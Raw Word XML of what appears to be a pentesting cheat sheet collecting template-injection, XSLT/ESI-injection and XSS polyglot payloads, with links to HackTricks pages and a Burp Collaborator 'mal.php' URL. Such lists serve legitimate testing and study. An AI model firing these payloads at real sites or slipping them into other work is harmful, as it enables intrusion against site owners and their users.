    </w:p>
    <w:p w14:paraId="36C77018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${{7*7}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2419B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Fonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24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#{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7*7}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181C7BCF" w14:textId="77777777" w:rsid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</w:p>
    <w:p w14:paraId="3380F2A1" w14:textId="77777777" w:rsid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</w:p>
    <w:p w14:paraId="2FFB7FE3" w14:textId="17C674F1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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA734D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Polygloths</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5E65EB59" w14:textId="35538365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702A4E7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Fonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24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{{7*7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}}$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{7*7}&lt;%= 7*7 %&gt;${{7*7}}#{7*7}${{&lt;%[%'"}}%\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7CF728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7" w:history="1">
        <w:r w:rsidRPr="00AA734D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XSLT Server Side Injection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="542266B6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46CB4243" w14:textId="5D0E3052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EB9DEA0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xsl:value-of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select="system-property('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xsl:version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')" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9E9B9B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esi:include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="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"&gt;&lt;/esi:include&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539E8592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B8ACBD5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657DBC4F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68F6DB2D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6BB2C68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4EC47056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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA734D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Polygloths</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="611663B7" w14:textId="0AB87A62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FC4078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xsl:value-of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select="system-property('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xsl:version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')" /&gt;&lt;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esi:include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="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"&gt;&lt;/esi:include&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660D902E" w14:textId="77777777" w:rsid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74DC78D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1241FF08" w14:textId="77777777" w:rsidR="00AA734D" w:rsidRPr="00AA734D" w:rsidRDefault="00AA734D" w:rsidP="00AA73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AA734D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E19BAB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AA734D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>Basic Tests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521DA6B8" w14:textId="2A0B7601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691B224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 onclick=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 a="</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6BEBFE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'"&gt;&lt;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img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=x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onerror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1) /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D492BBD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javascript:alert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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DFB11A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6E04CA2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6698FC2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</w:p>
    <w:p w14:paraId="7B1FE1E6" w14:textId="77777777" w:rsidR="00AA734D" w:rsidRPr="00AA734D" w:rsidRDefault="00AA734D" w:rsidP="00AA734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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA734D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Polygloths</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="112A38A8" w14:textId="5EAF10C9" w:rsidR="00AA734D" w:rsidRPr="00AA734D" w:rsidRDefault="00AA734D" w:rsidP="00AA7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BCC4180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:"/*'/*`/*--&gt;&lt;/noscript&gt;&lt;/title&gt;&lt;/textarea&gt;&lt;/style&gt;&lt;/template&gt;&lt;/noembed&gt;&lt;/script&gt;&lt;html \"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onmouseover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=/*&amp;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lt;svg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/*/onload=alert()//&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F99562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--&gt;'"/&gt;&lt;/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deTailS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open x="&gt;"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ontoggle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=(co\u006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efirm)`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`&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E487D3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:/*-/*`/*\`/*'/*"/**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/* */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oNcliCk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=alert() )//%0D%0A%0D%0A//&lt;/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stYle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titLe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teXtarEa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/--!&gt;\x3csVg/&lt;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sVg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oNloAd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=alert()//&gt;\x3e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243B7E7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"&gt;&gt;&lt;marquee&gt;&lt;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img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=x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onerror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=confirm(1)&gt;&lt;/marquee&gt;" &gt;&lt;/plaintext\&gt;&lt;/|\&gt;&lt;plaintext/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onmouseover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=prompt(1) &gt;&lt;script&gt;prompt(1)&lt;/script&gt;@gmail.com&lt;isindex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formaction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javascript:alert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(/XSS/) type=submit&gt;'--&gt;" &gt;&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;"&gt;&lt;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img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/id="confirm( 1)"/alt="/"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="/"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onerror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=eval(id&amp;%23x29;&gt;'"&gt;&lt;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img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src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="http: //i.imgur.com/P8mL8.jpg"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196FB31D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 onclick=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1)//&lt;button ‘ onclick=alert(1)//&gt; */ alert(1)//</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D371A20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';alert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String.fromCharCode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(88,83,83))//';alert(String. </w:t>
      </w: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88,83,83))//";alert(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String.fromCharCode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(88,83,83))//";alert(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String.fromCharCode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(88,83,83))//-- &gt;&lt;/SCRIPT&gt;"&gt;'&gt;&lt;SCRIPT&gt;alert(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String.fromCharCode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(88,83,83)) &lt;/SCRIPT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F23F7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javascript://'/&lt;/title&gt;&lt;/style&gt;&lt;/textarea&gt;&lt;/script&gt;--&gt;&lt;p" onclick=alert()//&gt;*/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)/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6979FCEA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javascript://--&gt;&lt;/script&gt;&lt;/title&gt;&lt;/style&gt;"/&lt;/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textarea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&gt;*/&lt;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)/*' onclick=alert()//&gt;a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E895DF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javascript://&lt;/title&gt;"/&lt;/script&gt;&lt;/style&gt;&lt;/textarea/--&gt;*/&lt;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)/*' onclick=alert()//&gt;/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CA3EF8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javascript://&lt;/title&gt;&lt;/style&gt;&lt;/textarea&gt;--&gt;&lt;/script&gt;&lt;a"//' onclick=alert()//&gt;*/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)/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DE50FC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javascript://'//" --&gt;&lt;/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textarea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&gt;&lt;/style&gt;&lt;/script&gt;&lt;/title&gt;&lt;b onclick= alert()//&gt;*/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)/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D5C9CA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javascript://&lt;/title&gt;&lt;/textarea&gt;&lt;/style&gt;&lt;/script --&gt;&lt;li '//" '*/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)/*', onclick=alert()//</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AAFB15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javascript:alert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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()//--&gt;&lt;/script&gt;&lt;/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textarea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&gt;&lt;/style&gt;&lt;/title&gt;&lt;a"//' onclick=alert()//&gt;*/alert()/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6F5761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--&gt;&lt;/script&gt;&lt;/title&gt;&lt;/style&gt;"/&lt;/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textarea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&gt;&lt;a' onclick=alert()//&gt;*/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)/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7077FCBA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/&lt;/title/'/&lt;/style/&lt;/script/&lt;/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textarea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/--&gt;&lt;p" onclick=alert()//&gt;*/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)/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46275944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javascript://--&gt;&lt;/title&gt;&lt;/style&gt;&lt;/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textarea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&gt;&lt;/script&gt;&lt;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svg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"//' onclick=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)//</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E985C8B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/&lt;/title/'/&lt;/style/&lt;/script/--&gt;&lt;p" onclick=alert()//&gt;*/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)/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66232E57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--&gt;'"/&gt;&lt;/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&gt;&lt;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svG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x="&gt;" onload=(co\u006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efirm)`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`&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB5A488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&lt;svg%0Ao%00nload=%09((pro\u006dpt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))(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)//</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4975E8F2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:"/*'/*`/*\" /*&lt;/title&gt;&lt;/style&gt;&lt;/textarea&gt;&lt;/noscript&gt;&lt;/noembed&gt;&lt;/template&gt;&lt;/script/--&gt;&lt;svg/onload=/*&lt;html/*/onmouseover=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)//&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B76695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:"/*\"/*`/*' /*&lt;/template&gt;&lt;/textarea&gt;&lt;/noembed&gt;&lt;/noscript&gt;&lt;/title&gt;&lt;/style&gt;&lt;/script&gt;--&gt;&lt;svg onload=/*&lt;html/*/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onmouseover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alert(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)//&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B46895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javascript:`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//"//\"//&lt;/title&gt;&lt;/textarea&gt;&lt;/style&gt;&lt;/noscript&gt;&lt;/noembed&gt;&lt;/script&gt;&lt;/template&gt;&lt;svg/onload='/*--&gt;&lt;html */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onmouseover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=alert()//'&gt;`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1CC929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%0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ajavascript:`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/*\"/*--&gt;&amp;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lt;svg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onload='/*&lt;/template&gt;&lt;/noembed&gt;&lt;/noscript&gt;&lt;/style&gt;&lt;/title&gt;&lt;/textarea&gt;&lt;/script&gt;&lt;html </w:t>
      </w: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onmouseover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="/**/ alert(test)//'"&gt;`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575E0A1A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:/*--&gt;&lt;/title&gt;&lt;/style&gt;&lt;/textarea&gt;&lt;/script&gt;&lt;/xmp&gt;&lt;svg/onload='+/"/+/onmouseover=1/+/[*/[]/+</w:t>
      </w:r>
      <w:proofErr w:type="gram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document.location</w:t>
      </w:r>
      <w:proofErr w:type="gram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=`//localhost/mH`//'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB669FA" w14:textId="77777777" w:rsidR="00AA734D" w:rsidRPr="00AA734D" w:rsidRDefault="00AA734D" w:rsidP="00AA734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E599" w:themeFill="accent4" w:themeFillTint="66"/>
        <w:rPr>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart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AA734D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:"/*'/*`/*--&gt;&lt;/noscript&gt;&lt;/title&gt;&lt;/textarea&gt;&lt;/style&gt;&lt;/template&gt;&lt;/noembed&gt;&lt;/script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA9CBCE" w14:textId="77777777" w:rsidR="00AA734D" w:rsidRPr="00AA734D" w:rsidRDefault="00AA734D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00AA734D" w:rsidRPr="00AA734D">
      <w:footerReference w:type="even" r:id="rId18"/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6ED2" w14:textId="77777777" w:rsidR="004114EA" w:rsidRDefault="004114EA" w:rsidP="00AA734D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5EBF1D60" w14:textId="77777777" w:rsidR="004114EA" w:rsidRDefault="004114EA" w:rsidP="00AA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23E5" w14:textId="04B5D16C" w:rsidR="00AA734D" w:rsidRDefault="00AA73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2FBC87" wp14:editId="1864CB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44640" w14:textId="72D7BDD1" w:rsidR="00AA734D" w:rsidRPr="00AA734D" w:rsidRDefault="00AA734D" w:rsidP="00AA73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A734D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FBC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6144640" w14:textId="72D7BDD1" w:rsidR="00AA734D" w:rsidRPr="00AA734D" w:rsidRDefault="00AA734D" w:rsidP="00AA73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A734D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3B9A" w14:textId="5C5FBC2A" w:rsidR="00AA734D" w:rsidRDefault="00AA73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C27930" wp14:editId="4442D5A0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21CEFC" w14:textId="5D0E8EF5" w:rsidR="00AA734D" w:rsidRPr="00AA734D" w:rsidRDefault="00AA734D" w:rsidP="00AA73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A734D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279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521CEFC" w14:textId="5D0E8EF5" w:rsidR="00AA734D" w:rsidRPr="00AA734D" w:rsidRDefault="00AA734D" w:rsidP="00AA73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A734D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77B4" w14:textId="580068B7" w:rsidR="00AA734D" w:rsidRDefault="00AA73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BE1943" wp14:editId="3780BA0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F50E2" w14:textId="603EB163" w:rsidR="00AA734D" w:rsidRPr="00AA734D" w:rsidRDefault="00AA734D" w:rsidP="00AA73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A734D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E19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62F50E2" w14:textId="603EB163" w:rsidR="00AA734D" w:rsidRPr="00AA734D" w:rsidRDefault="00AA734D" w:rsidP="00AA73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A734D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E448C" w14:textId="77777777" w:rsidR="004114EA" w:rsidRDefault="004114EA" w:rsidP="00AA734D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="40F1D5B2" w14:textId="77777777" w:rsidR="004114EA" w:rsidRDefault="004114EA" w:rsidP="00AA7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A1"/>
    <w:rsid w:val="001858A1"/>
    <w:rsid w:val="00240D72"/>
    <w:rsid w:val="004114EA"/>
    <w:rsid w:val="00835E55"/>
    <w:rsid w:val="00845DCA"/>
    <w:rsid w:val="00AA734D"/>
    <w:rsid w:val="00B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239A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{D97FFD3F-FAFA-4576-9E13-172FF67D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A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34D"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00AA7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x-w-3xl">
    <w:name w:val="max-w-3xl"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00AA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734D"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AA734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3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l-3">
    <w:name w:val="ml-3"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00AA734D"/>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AA73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9376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538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13367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74453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430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148190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6834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610699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581359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284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531529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4875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555695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307094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879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714277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650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057249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952472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414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441364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99573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7107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390783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341628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4918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030601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936634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0065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978670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053893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7391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397528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645818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9086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133344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8043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462278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217828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463673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2039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86679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599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637550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662148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6176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242260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9699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465050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255842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7233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55631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2419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65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hacktricks.xyz/pentesting-web/crlf-0d-0a" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/pentesting-web/regular-expression-denial-of-service-redos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ook.hacktricks.xyz/pentesting-web/command-injection" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/pentesting-web/xslt-server-side-injection-extensible-stylesheet-language-transform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ok.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection" TargetMode="Externa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book.hacktricks.xyz/pentesting-web/client-side-template-injection-csti" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/pentesting-web/open-redirec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ook.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///\\asdasdasdasd.burpcollab.com/mal.php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book.hacktricks.xyz/pentesting-web/file-inclusion" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/pentesting-web/server-side-inclusion-edge-side-inclusion-injec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1486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2024-07-07T05:25:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-07T05:33:00Z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2024-07-07T05:25:25Z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71e9924b-1883-4ad9-a649-33f967a314df</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="11" name="MSIP_Label_57443d00-af18-408c-9335-47b5de3ec9b9_ContentBits">
    <vt:lpwstr>2</vt:lpwstr>
  </property>
</Properties>
</file>